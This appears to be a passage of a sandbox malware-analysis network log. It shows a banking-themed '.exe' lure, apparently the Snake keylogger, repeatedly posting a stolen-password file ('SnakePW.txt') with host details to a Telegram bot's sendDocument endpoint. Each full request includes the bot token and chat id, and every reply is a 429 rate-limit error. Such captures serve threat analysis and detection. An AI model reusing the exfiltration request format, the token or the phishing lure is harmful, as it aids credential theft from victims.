                                      26192.168.2.449775149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:00 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce073b24df0e5
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:00:00 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 37 33 62 32 34 64 66 30 65 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce073b24df0e5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:00 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:00 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 24
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:00 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 34 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 34 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 24","parameters":{"retry_after":24}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      27192.168.2.449776149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:01 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce08832dff190
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:00:01 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 38 38 33 32 64 66 66 31 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce08832dff190Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:01 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:01 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 23
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:01 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 33 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 33 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 23","parameters":{"retry_after":23}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      28192.168.2.449777149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:02 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce09df11423b5
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:00:02 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 39 64 66 31 31 34 32 33 62 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce09df11423b5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:02 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:02 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 22
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:02 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 32 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 32 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 22","parameters":{"retry_after":22}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      29192.168.2.449778149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:03 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce0afd108cf84
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:00:03 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 61 66 64 31 30 38 63 66 38 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce0afd108cf84Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:03 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:03 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 21
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:03 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 31 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 31 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 21","parameters":{"retry_after":21}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      30192.168.2.449779149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:04 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce0c6c35cc3ba
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:00:04 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 63 36 63 33 35 63 63 33 62 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce0c6c35cc3baContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:04 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:04 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 20
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:04 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 30 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 30 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 20","parameters":{"retry_after":20}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      31192.168.2.449780149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:05 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce0ddac14642b
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:00:05 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 64 64 61 63 31 34 36 34 32 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce0ddac14642bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:05 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:05 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 19
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:05 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 39 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 19","parameters":{"retry_after":19}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      32192.168.2.449781149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:06 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce0f85900c0ec
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:00:06 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 66 38 35 39 30 30 63 30 65 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce0f85900c0ecContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:06 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:06 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 18
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:06 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 38 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 38 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 18","parameters":{"retry_after":18}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      33192.168.2.449782149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:07 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce115816465e3
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:00:07 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 31 31 35 38 31 36 34 36 35 65 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce115816465e3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:07 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:07 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 17
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:07 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 37 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 37 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 17","parameters":{"retry_after":17}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      34192.168.2.449783149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:00:08 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dce12ecfdbceae
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:00:08 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 31 32 65 63 66 64 62 63 65 61 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dce12ecfdbceaeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:00:08 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:00:08 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 16
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:00:08 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 36 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 36 7d 7d
